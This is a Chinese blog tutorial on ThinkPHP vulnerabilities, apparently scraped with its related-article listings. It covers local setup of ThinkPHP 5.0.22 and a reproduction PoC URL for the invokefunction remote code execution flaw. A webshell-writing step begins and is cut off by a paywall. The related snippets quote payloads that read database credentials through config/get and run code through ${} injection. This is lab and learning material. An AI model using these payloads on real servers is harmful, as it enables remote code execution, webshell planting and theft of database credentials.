ThinkPHP框架漏洞总结

最新推荐文章于 2025-03-25 00:31:05 发布
原创 最新推荐文章于 2025-03-25 00:31:05 发布 · 4.3k 阅读 · 26 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#thinkphp

本文详述了ThinkPHP框架存在的多个安全漏洞,包括任意代码执行和SQL注入等,展示了漏洞的复现过程,并提供了相应的安全防护措施,如升级框架版本、应用补丁等。同时,提到了一些自动化工具用于ThinkPHP漏洞扫描。

Thinkphp简介

ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。

Thinkphp本地安装

官网链接:http://www.thinkphp.cn/down.html

image-20210823165648788

本地搭建

1 安装vc9_x86(必装)

image-20210823170548411

2安装phpstudy20161103

image-20210823170813904

开启php

将下载好的thinkphp5.0.22解压,可以得到下图中的内容,将所有文件复制到网站的根目录,也就是www/web(这个是我新建的文件夹)

image-20210825094334990

输入域名,这里本地,可以输入127.0.0.1或者localhost或者本地ip都可(这里如果是默认的域名,远程访问的时候要改一下hosts文件),网站目录可以是任意文件夹,默认是phpstudy安装目录下的WWW文件夹,点击新增后再点击保存设置并生成配置文件即可:

image-20210825095401415

image-20210825095951627

thinkphp的主目录是在public目录下,所以要进vhosts-conf文件配置目录

image-20210825095910729

image-20210825100126133

image-20210825100155321

即可远程访问

Thinkphp本地复现

验证poc

http://192.168.8.89/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_arra
y&vars[0]=phpinfo&vars[1][]=-1%20and%20it%27ll%20execute%20the%20phpinfo

image-20210825102917102

写入一句话

<?php eval($_POS
最低0.47元/天 解锁文章
qyshskx
关注
【vulhub】thinkphp漏洞系列
2401_86835152的博客
09-03 683
通过 get、header、cookie 等位置传入参数实现目录穿越和文件包含,从而利用 pearcmd 文件包含实现远程命令执行通过构造特定的 URL,可以实现目录穿越和文件包含,然后利用 pearcmd 文件包含实现远程命令执行。具体来说,该框架在使用preg_replace的/e模式匹配路由时,未对用户输入参数进行充分过滤,导致输入参数被直接插入双引号中执行,从而引发任意代码执行漏洞。模式进行正则匹配,用户输入的参数可能被直接注入到代码执行上下文中,导致攻击者可构造恶意输入执行任意代码。
常见框架漏洞
Hacker0830的博客
04-13 2650
原理:当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编码后存储在cookie的rememberMe字段中,服务端收到登录请求后,会对rememberMe的cookie值进行base64解码,接着进行AES解密,然后反序列化。S2-059:攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。
【web安全】——常见框架漏洞
wxh的博客
10-06 2384
详细介绍了web框架中的常见漏洞,如thinkphp,struts2,shiro,spring,log4j2,fastjson反序列化
ThinkPHP漏洞详解(自学)
m0_64481831的博客
03-01 4743
Thinkphp是一个快速、兼容而且简单的轻量级PHP开发框架ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架Thinkphp发展至今,主要有2.x、3.x、5.x、6.x系列,其中2.x和3.x系列官方已停止维护,5.x系列是目前使用最多的一个系列,而3.x系列比较多的老用户。
thinkphp漏洞总结
热门推荐
scu_hacker博客
01-19 1万+
目录 前言 一、远程代码执行漏洞 1.1 影响范围 1.2 漏洞详情 二、5.x远程命令注入 三、5.1.x SQL注入 前言 thinkphp是一个国内轻量级的开发框架,采用php+apache,在更新迭代中,thinkphp也经常爆出各种漏洞thinkphp一般有thinkphp2、thinkphp3、thinkphp5、thinkphp6版本,前两个版本已经停止更新,主要介绍下thinkphp5的漏洞 一、远程代码执行漏洞 1.1 影响范围 thinkphp&l...
ThinkPHP漏洞总结(利用)
yangbz123的博客
04-26 1万+
ThinkPHP介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ...
Thinkphp框架漏洞(附修复方法)
C233333235的博客
08-07 1133
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
thinkphp漏洞检测工具
06-06
2. **漏洞扫描**:运行工具后,它会自动遍历指定的URL,检查ThinkPHP框架中的常见漏洞。这个过程可能需要一些时间,因为工具会尝试各种可能的攻击向量。 3. **结果分析**:扫描完成后,工具会生成一份报告,列明...
常见框架漏洞(一)----Thinkphp(TP)
最新发布
qq_65379983的博客
03-25 1133
远程代码执行
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
10-25
主要介绍了ThinkPHP框架任意代码执行漏洞的利用及其修复方法,该漏洞的修复对于广大使用ThinkPHP的开发人员来说尤为重要!需要的朋友可以参考下
ThinkPHP漏洞合集(专注渗透视角)
LainWith的博客
04-11 1万+
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
Thinkphp常见漏洞总结
weixin_46622976的博客
07-12 7109
ThinkPHP漏洞整理
渗透测试 | ThinkPHP渗透
weixin_50464560的博客
03-31 3235
转载至 渗透测试 | ThinkPHP渗透 - FreeBuf网络安全行业门户 前言 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为 ThinkPHP 它遵循 Apache2开源协议发布,从 Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了 Struts的思想和 TagLib(标签库)、RoR的ORM映射和 ActiveRecord模式。 Thi..
ThinkPHP框架常见漏洞的探讨
sys333666999的博客
06-27 632
为了防范远程代码执行漏洞,开发者应加强对用户输入数据的验证和过滤,避免将用户输入直接拼接到代码或SQL语句中,同时及时更新框架版本,修复已知的安全漏洞。在ThinkPHP框架中,如果开发者对用户提交的数据未进行充分的过滤和转义,就可能导致XSS漏洞的产生。在ThinkPHP框架中,如果开发者对上传的文件未进行充分的验证和过滤,就可能导致恶意文件的上传和执行。为了防范文件上传漏洞,开发者应对上传的文件类型、大小和内容进行严格的限制和检查,避免接受不必要的文件类型。
Thinkphp漏洞总结
qq_44640313的博客
11-02 1105
ThinkPHP框架漏洞知识总结
thinkphp漏洞集合
weixin_34113237的博客
06-01 3404
整合了一个集合,方便查询 thinkphp 5.0.22 1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.passwor...
ThinkPHP 系列漏洞
SHELLCODE_8BIT的博客
11-18 4759
所有 sql 注入漏洞均在 library/think/db/Builder.php 文件中。1、thinkphp5 SQL注入1漏洞影响版本: 5.0.13
thinkphp框架漏洞
huike008的博客
02-14 331
thinkphp框架爆出了一个任意代码执行漏洞,其危害性相当的高,漏洞利用方法如下: ? index.php/module/aciton/param1/${@ print (THINK_VERSION)} index.php/module/aciton/param1/${@function_all()} 其中的function_all代表任何函数,比如: ...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值